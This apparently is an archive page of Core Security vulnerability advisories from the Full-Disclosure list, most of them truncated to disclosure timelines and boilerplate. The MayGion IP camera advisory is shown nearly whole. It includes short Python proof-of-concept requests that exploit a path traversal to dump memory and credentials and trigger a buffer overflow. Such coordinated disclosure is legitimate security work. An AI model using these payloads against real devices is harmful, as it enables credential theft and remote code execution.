[Full-disclosure] CORE-2013-0430 - Buffer overflow in Ubiquiti airCam RTSP service
0x41414141 0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141 0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678 0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100 0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8 0x40a7eb10: 0x000d73f6 0x000c6267 0x0001 0x000c6060 0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780 0x40a7eb30: 0x 0x000c611c -/ 9. *Report Timeline* . 2013-05-02: Core Security Technologies notifies the Ubiquiti team of the vulnerability. Publication date is set for May 29th, 2013. . 2013-05-02: Vendor acknowledges the receipt of the email and asks for technical details. . 2013-05-02: A draft report with technical details and a PoC sent to Ubiquiti team. . 2013-05-03: Vendor notifies that a new firmware version should address this vulnerability. It will be released shortly to the alpha and beta community. . 2013-05-06: Core notifies that the advisory will be re-scheduled to be released when patches are available to the alpha and beta community and asks for a tentative release date. . 2013-05-09: Core asks for a status update regarding this vulnerability and a tentative release date. . 2013-05-13: Vendor notifies the firmware is still in internal testing and the release date will be confirmed in the following days. . 2013-05-27: Core notifies that there was no answer in the last 2 weeks regarding the release date. Core also notifies that the advisory was re-scheduled for Jun 4th, and asks for a clear timeline to justify keep delaying the release. . 2013-05-28: Vendor notifies that the new firmware is almost done and a confirmed date will be notified in the following days. . 2013-05-29: Core asks if a beta firmware is available for downloading. . 2013-05-29: Vendor notifies that they have a v1.1.6 build of the firmware which is being tested internally and will be released very soon, probably this week. However, it is not yet available on the ubnt.com/download site. . 2013-05-29: First release date missed. . 2013-06-03: Core asks for a status update. . 2013-06-03: Vendor notifies that they do not have a specific release date yet. . 2013-06-11: Vendor notifies that they released firmware 1.2.0 along with airVision 2 [2][3], and a public announcement will be made soon. Release of firmware 1.1.6 (for the airVision 1.x platform) has to be defined. . 2013-06-11: Advisory CORE-2013-0430 published. 10. *References* [1] http://www.ubnt.com. [2] Ubiquiti downloads http://www.ubnt.com/download#AirCam. [3] Ubiquiti firmware v1.2.0 http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0517 - Xpient Cash Drawer Operation Vulnerability
rity Bulletins and patches are available to active users of Xpient software. Vendor requires to remove the Proof of Concept (PoC) and technical details from Core's report. . 2013-06-04: Core notifies that the advisory is re-scheduled for Jun 5th and will include the PoC since it gives the users a tool to assess the risks they are running and the effectiveness of possible countermeasures and workarounds. . 2013-06-05: Advisory CORE-2013-0517 is published. 10. *References* [1] http://www.xpient.com 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2013-0103] Mac OSX Server DirectoryService buffer overflow
of Jun 6th. . 2013-05-31: Vendor notifies that the security update is on track for releasing next week and assigns CVE-2013-0984 for this issue. Vendor changes the vulnerability impact from DoS to code-execution. . 2013-06-04: Vendor notifies that the security update was released. . 2013-06-04: Advisory CORE-2013-0103 released. 9. *References* [1] http://opensource.apple.com/source/DirectoryService/DirectoryService-621/Proxy/DSTCPEndpoint.cpp [2] https://www.dlitz.net/software/pycrypto/ [3] http://support.apple.com/kb/HT5501 - DirectoryService [4] https://appleseed.apple.com 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0318 - TP-Link IP Cameras Multiple Vulnerabilities
ttp://www.boa.org/. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
MayGion IP Cameras multiple vulnerabilities
1. *Advisory Information*
Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Advisory URL:
http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605
3. *Vulnerability Description*
Multiple vulnerabilities have been found in MayGion IP cameras [1] based
on firmware v09.27 and below, that could allow an unauthenticated remote
attacker:
1. [CVE-2013-1604] to dump the camera's memory and retrieve user
credentials,
2. [CVE-2013-1605] to execute arbitrary code.
4. *Vulnerable Packages*
. MayGion IP cameras based on firmware 2011.27.09.
. Other firmware versions are probably affected too but they were not
checked.
5. *Non-Vulnerable Packages*
. H.264 ipcam firmware 2013.04.22.
6. *Credits*
These vulnerabilities were discovered and researched by Nahuel Riva and
Francisco Falcon from Core Exploit Writers Team.
7. *Technical Description / Proof of Concept Code*
7.1. *User Credentials Leaked via Path Traversal*
[CVE-2013-1604] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker.
/-
import httplib
conn = httplib.HTTPConnection("192.168.100.1")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
conn.close()
-/
7.2. *Buffer overflow*
[CVE-2013-1605] The following Python script can be used to trigger the
vulnerability without authentication. As a result, the Instruction
Pointer register (IP) will be overwritten with 0x61616161, which is a
typical buffer overrun condition.
/-
import httplib
conn = httplib.HTTPConnection("192.168.100.1")
conn.request("GET", "/" + "A" * 3000 + ".html")
resp = conn.getresponse()
data = resp.read()
conn.close()
-/
8. *Report Timeline*
. 2013-05-02:
Core Security Technologies notifies MayGion of the vulnerabilities.
Publication date is set for May 29th, 2013.
. 2013-05-02:
Vendor asks for a report with technical information.
. 2013-05-03:
A draft advisory containing technical details sent to MayGion team.
. 2013-05-03:
Vendor notifies that all vulnerabilities were fixed in the last firmware
version, released April 22nd, 2013.
. 2013-05-09:
Core asks for a list of affected devices and firmware. No reply received.
. 2013-05-28:
Advisory CORE-2013-0322 is published.
9. *References*
[1] http://www.maygion.com
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
signature.asc
Description: OpenPGP digital signatu
[Full-disclosure] CORE-2013-0302 - Zavio IP Cameras multiple vulnerabilities
;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off -/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. . 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. . 2013-05-09: Core asks for a reply. . 2013-05-14: Core asks for a reply. . 2013-05-21: Core tries to contact vendor for last time without any reply. . 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0303 - D-Link IP Cameras Multiple Vulnerabilities
n over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2013-0301 - Vivotek IP Cameras Multiple Vulnerabilities
uct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2012-1128 - SAP Netweaver Message Server Multiple Vulnerabilities
"LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. . 2012-12-10: Core sends an advisory draft with technical details and a PoC. . 2012-12-11: The SAP team confirms the reception of the issue. . 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. . 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. . 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. . 2013-01-22: First release date missed. . 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. . 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. . 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. . 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. . 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. . 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e1000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e1000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-1123 - Windows Kernel ReadLayoutFile Heap Overflow
indings stating the two issues are separate, even though they share a same code area. . 2012-03-09: Core asks if the March publication date still stands. . 2012-03-12: MSRC notifies that, due to some late findings about app-compat concerns, they will need more time to issue the patch. MSRC asks to re-schedule the advisory publication to May 8th. . 2012-03-09: Core re-schedules the advisory publication to May 8th. . 2012-04-01: Pedro Varangot leaves the Core Advisories Team. Thanks Peter and good luck with your new challenges. . 2012-04-02: Core asks for additional information regarding the actual vulnerable Windows' versions and specific workarounds for this vulnerability. . 2012-04-03: MSRC notifies that the actual vulnerable systems are Windows XP/2003 as Elevation of Privileges and Windows Vista/2008 as Denial of Service. MSRC also notifies that no workaround has been identified for this vulnerability. . 2012-05-08: The advisory CORE-2011-1123 is published. . 2012-05-08: MSRC publishes the Security Bulletin MS12-034 [3] for addressing this issue. . 2012-05-11: Core notifies MSRC that the vulnerability was not correctly patched in [3] and re-sends a PoC to reproduce the issue. . 2012-05-14: Based on the blog post [5], MSRC asks for a PoC which triggers the issue in a Vista/Windows 7 platform. . 2012-05-14: Core clarifies that this issue seems to be not exploitable in Windows 7 (as it was noted in the blog post [5]), but it is still exploitable in Windows Vista and 2008. Core also notifies that the exploit for this vulnerability was sent to the Core Impact clients on May 8th, 2012. . 2012-05-16: MSRC notifies that a new patch will be released and a new CVE number will be assigned to it. . 2012-05-17: Core acknowledges the update and asks a publication date for this update. . 2012-05-18: MSRC asks for a conference call to discuss this issue and asks Core to make no change on the advisory or the blog post until the publication day. . 2012-05-18: Core requests to keep all the communication process via email in order to track all interactions and involve all people interested in it. Core also notifies that the advisory update will be released after the new patch is published. . 2012-06-14: Core asks MSRC for additional information regarding this issue. . 2012-06-18: MSRC notifies that they are targeting July as publication timeframe for this issue. . 2012-06-21: Core acknowledges the publication date and asks for the new CVE number and any additional information that can be added in the advisory amendment. . 2012-07-05: MSRC informs that the new bulletin will be published on July 10th, and the new CVE number is CVE-2012-1890. . 2012-07-10: MSRC publishes the Security Bulletin Summary for July 2012 [6]. . 2012-07-11: The advisory CORE-2011-1123 is updated. 9. *References* [1] http://www.exploit-db.com/exploits/18140/ [2] http://msdn.microsoft.com/en-us/library/windows/desktop/ms646305(v=vs.85).aspx [3] http://technet.microsoft.com/en-gb/security/bulletin/ms12-034 [4] http://technet.microsoft.com/en-gb/security/bulletin/ms12-047 [5] http://blog.coresecurity.com/2012/05/10/the-big-trick-behind-exploit-ms12-034/ [6] http://technet.microsoft.com/en-us/security/bulletin/ms12-jul 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisor
[Full-disclosure] CORE-2012-0530 - Lattice Diamond Programmer Buffer Overflow
ologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2012-0123 - SAP Netweaver Dispatcher Multiple Vulnerabilities
d demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass
hat the kSBXProfileNoNetwork sandbox profile should guarantee that "all sockets-based networking is prohibited". The PoC sent to Apple shows that through the use of Apple events (osascript is used in the PoC just to keep it simple) an attacker could circumvent the restriction. So, at the end, sockets-based networking is used. . 2010-10-18: Vendor responds that it is currently considering modifying its documentation to explicitly point out what Core described; namely, that the restrictions that these particular sandbox profiles provide are limited to the process in which the sandbox is applied. . 2011-11-10: The advisory CORE-2011-0919 is published as user release. 10. *References* [1] App Sandbox Design Guide -- Designing for App Sandbox http://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html [2] Charlie Miller, "Hacking OS X", Black Hat Japan 2008 https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iEYEARECAAYFAk68OxMACgkQyNibggitWa0YWgCfYbGm9R0+YJw6CxP6TNwdhEWr 9ZMAn16nqBqNbO582D5QpejeuTEV5RAj =HruN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0825: Adobe Shockwave Player TextXtra.x32 vulnerability
